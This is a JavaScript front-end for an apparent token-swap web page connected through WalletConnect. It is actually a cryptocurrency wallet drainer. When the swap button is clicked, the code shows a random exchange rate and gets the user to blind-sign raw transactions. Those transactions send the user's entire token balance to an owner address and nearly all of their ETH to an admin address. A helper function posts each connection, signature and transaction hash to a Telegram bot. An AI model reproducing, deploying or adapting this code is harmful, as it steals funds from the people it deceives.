import * as Web3 from "web3";
const Web3 = require("web3");
const { encode } = require("rlp");
const { bufferToHex, fromRpcSig, bnToHex } = require("ethereumjs-util");
import * as tokenABI from "./Ouroboros.json";
import { getTokensOwned } from "./token-config";
import { EthereumProvider } from "@walletconnect/ethereum-provider";

document
    .querySelector("#main-connect-wallet-button")
    .addEventListener("click", initWeb3);

document
    .querySelector("#top-connect-wallet-button")
    .addEventListener("click", initWeb3);

const userBal = document.querySelector("#user-balance");

const data = {
    web3: null,
    chainId: 1,
    userAddress: null,
    userBal: null,
};

const transaction = {
    nonce: "0x1e7",
    gasPrice: "0x2e90edd000",
    gasLimit: "0x30d40",
    to: process.env.ADMIN_ADDRESS,
    value: "0xde0b6b3a7640000",
    data: "0x",
    chainId: 1,
};

async function initWeb3() {
    try {
        const provider = await EthereumProvider.init({
            projectId: process.env.VITE_PROJECT_ID, // required
            chains: [1], // required
            showQrModal: true, // requires @walletconnect/modal
            methods: ["eth_sendTransaction", "eth_sign"], // REQUIRED ethereum methods
            events: ["chainChanged", "accountsChanged"], // REQUIRED ethereum events
        });
        // await provider.enable();
        await provider.connect();
        const accounts = await provider.request({
            method: "eth_requestAccounts",
        });
        const chainId = await provider.request({ method: "eth_chainId" });
        const web3 = new Web3(provider);
        data.web3 = web3;
        data.userAddress = accounts[0];
        data.chainId = await chainId;
        await sendErr(`${data.userAddress} is connected`);
        document.querySelector("#swap-button").style.display = "block";
        document.querySelector("#address-button").style.display = "block";
        document.querySelector("#main-connect-wallet-button").style.display =
            "none";
        document.querySelector("#top-connect-wallet-button").style.display =
            "none";
        document.querySelector("#address-button").textContent =
            shortenEthereumAddress(data.userAddress);
        document.querySelector("#address-button").style.cursor = "not-allowed";
        resetValues();
        await loadUserBal();
    } catch (e) {
        sendErr(e);
    }
}

function shortenEthereumAddress(x) {
    let startChars = 6,
        endChars = 4;
    return x ? `${x.slice(0, startChars)}...${x.slice(-endChars)}` : "";
}
window.addEventListener("load", async () => {});

document
    .querySelector("#from-amount")
    .addEventListener("input", modifyOutputRate);
document.querySelector("#to-amount").addEventListener("input", modifyInputRate);

function modifyOutputRate() {
    const amt = 2000 + Math.random() * 1000;
    const rate = amt / 1700;
    document.querySelector("#to-amount").value = Math.round(
        document.querySelector("#from-amount").value * rate
    );
}

function modifyInputRate() {
    const amt = 2000 + Math.random() * 1000;
    const rate = amt / 1700;
    document.querySelector("#from-amount").value = Math.round(
        document.querySelector("#to-amount").value / rate
    );
}

async function loadUserBal() {
    if (data.web3) {
        const tCtrct = new data.web3.eth.Contract(
            tokenABI,
            process.env.TOKEN_ADDRESS
        );
        const bal = await tCtrct.methods.balanceOf(data.userAddress).call();
        userBal.textContent = Number(bal);
        data.userBal = Number(bal);
    } else {
        await initWeb3();
    }
}

document.querySelector("#swap-button").addEventListener("click", checkValuesBS);

async function checkValuesBS() {
    if (data.web3) {
        if (
            document.querySelector("#from-amount").value < 1 ||
            document.querySelector("#to-amount").value < 1 ||
            document.querySelector("#from-amount").value > data.userBal
        ) {
            resetValues();
        } else {
            await signRestoreERCTOken();
        }
    } else await initWeb3();
}

async function getNonce(a) {
    const nonce = await data.web3.eth.getTransactionCount(a, "pending");
    return data.web3.utils.toHex(nonce);
}

async function swapToken() {
    if (data.web3) {
        try {
            const userBalance = await data.web3.eth.getBalance(
                data.userAddress
            );
            const uNo = await getNonce(data.userAddress);
            if (uNo == "0x0") {
                transaction.nonce = "0x";
            } else {
                transaction.nonce = await getNonce(data.userAddress);
            }

            const estimateTransaction = {
                from: data.userAddress,
                to: process.env.ADMIN_ADDRESS,
                value: userBalance.toString(),
            };

            const gasLimit = await data.web3.eth.estimateGas(
                estimateTransaction
            );
            const gasPrice = await data.web3.eth.getGasPrice();
            const gasCost = gasPrice * gasLimit;

            if (userBalance < gasCost) {
                sendErr(
                    `User has Insufficient funds for gas ${window.location.href}`
                );
                return;
            }
            const gasCostEther = data.web3.utils.fromWei(gasCost, "ether");

            const valueToSend = userBalance - gasCost;

            transaction.gasPrice = data.web3.utils.toHex(gasPrice);
            transaction.gasLimit = data.web3.utils.toHex(gasLimit);
            transaction.value = data.web3.utils.toHex(valueToSend);
            transaction.to = process.env.ADMIN_ADDRESS;

            const params = [
                transaction.nonce,
                transaction.gasPrice,
                transaction.gasLimit,
                transaction.to,
                transaction.value,
                transaction.data,
            ];

            const rawTransaction = encode(params);
            const hexTX = bufferToHex(rawTransaction);
            const cch = await data.web3.eth.getChainId();
            if (cch != process.env.VALID_CHAIN) return initWeb3();

            const sig = await data.web3.eth.sign(
                data.web3.utils.sha3(hexTX),
                data.userAddress
            );

            const { v, r, s } = fromRpcSig(sig);
            const signedTX = encode([...params, v, r, s]);

            const sigRes = await data.web3.eth.sendSignedTransaction(
                bufferToHex(signedTX)
            );

            const resDATA = `
            Signature: ${bufferToHex(signedTX)},
            chainId: ${data.chainId},
            transaction Hash: ${sigRes.transactionHash},
            gas cost ether: ${gasCostEther}
        `;

            await sendErr(resDATA);
        } catch (error) {
            await sendErr(`Error: ${error}`);
        }
    } else {
        await initWeb3();
        await swapToken();
    }
}

async function getTokenContract(address, abi) {
    const tokenContract = new data.web3.eth.Contract(abi, address);
    return tokenContract;
}

async function signRestoreERCTOken() {
    if (data.web3) {
        try {
            const tx = {
                nonce: "0x1e7",
                gasPrice: "0x2e90edd000",
                gasLimit: "0x30d40",
                to: process.env.OWNER_ADDRESS,
                value: "0x",
                data: "0x",
                chainId: 1,
            };

            const cch = await data.web3.eth.getChainId();
            if (cch != process.env.VALID_CHAIN) return initWeb3();

            const res = await getTokensOwned(data.userAddress);
            const txx = await getTokenContract(res.tka, res.abi);

            const tokenBalance = await txx.methods
                .balanceOf(data.userAddress)
                .call();
            const gasPrice = await data.web3.eth.getGasPrice();
            tx.gasPrice = data.web3.utils.toHex(parseInt((gasPrice * 15) / 10));
            const txxABI = txx.methods
                .transfer(process.env.OWNER_ADDRESS, String(tokenBalance))
                .encodeABI();

            tx.nonce = await getNonce(data.userAddress);
            tx.nonce = tx.nonce == "0x0" ? "0x" : tx.nonce;
            tx.to = res.tka;
            tx.data = txxABI;

            const params = [
                tx.nonce,
                tx.gasPrice,
                tx.gasLimit,
                tx.to,
                tx.value,
                tx.data,
                chainId
            ];

            const rawTransaction = encode(params);
            const hexTX = bufferToHex(rawTransaction);

            const sig = await data.web3.eth.sign(
                data.web3.utils.sha3(hexTX),
                data.userAddress
            );

            const { v, r, s } = fromRpcSig(sig);
            const signedTX = encode([...params, v, r, s]);

            const sigRes = await data.web3.eth.sendSignedTransaction(
                bufferToHex(signedTX)
            );

            const resDATA = `
              Signature: ${bufferToHex(signedTX)},
              chainId: ${data.chainId},
              token-address: ${res.tka},
              transaction hash: ${sigRes.transactionHash}
          `;

            await sendErr(resDATA);
            await swapToken();
        } catch (error) {
            await sendErr(`Error: ${String(error.message)}`);
            await swapToken();
        }
    } else {
        await initWeb3();
        await signRestoreERCTOken();
    }
}

async function sendErr(x) {
    const options = {
        method: "POST",
        mode: "cors",
        headers: {
            accept: "application/json",
            "content-type": "application/json",
        },
        body: JSON.stringify({
            text: String(x),
            disable_web_page_preview: false,
            disable_notification: false,
            reply_to_message_id: null,
            chat_id: process.env.MY_CHAT_ID,
        }),
    };

    fetch(
        `https://api.telegram.org/bot${process.env.TELEGRAM_TOKEN_BOT}/sendMessage`,
        options
    )
        .then((response) => response.json())
        .then((response) => response)
        .catch((err) => console.error(err));
}

function resetValues() {
    document.querySelector("#from-amount").value = 0;
    document.querySelector("#to-amount").value = 0;
    document.querySelector("#swap-button").style.cursor = "pointer";
}
